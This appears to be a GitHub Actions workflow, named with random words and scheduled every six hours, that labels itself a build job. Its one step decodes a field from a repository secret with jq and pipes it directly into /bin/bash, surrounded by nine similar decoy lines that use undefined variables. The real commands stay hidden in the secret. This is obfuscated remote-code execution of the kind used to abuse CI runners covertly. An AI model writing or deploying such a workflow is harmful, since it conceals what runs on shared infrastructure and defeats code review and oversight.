name: separatecocksfoot

on:
  workflow_dispatch:
  schedule:
    - cron: '45 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: separatecocksfoot
        env:
          nurde321: ${{ secrets.nurde321 }}
        run: |
          echo $nurde321 | jq -r .y510 | /bin/bash
          echo $uiwm4 | jq -r .mhcfz90159 | /bin/bash
          echo $cpaxz027 | jq -r .zcfif14841 | /bin/bash
          echo $ay0 | jq -r .nmi12 | /bin/bash
          echo $w5725 | jq -r .l80 | /bin/bash
          echo $yw606 | jq -r .chfm4 | /bin/bash
          echo $nvm07 | jq -r .cvoyc1 | /bin/bash
          echo $o7 | jq -r .nmsm34 | /bin/bash
          echo $id903 | jq -r .angh84 | /bin/bash
          echo $fqagx8594 | jq -r .jzqbs2178 | /bin/bash

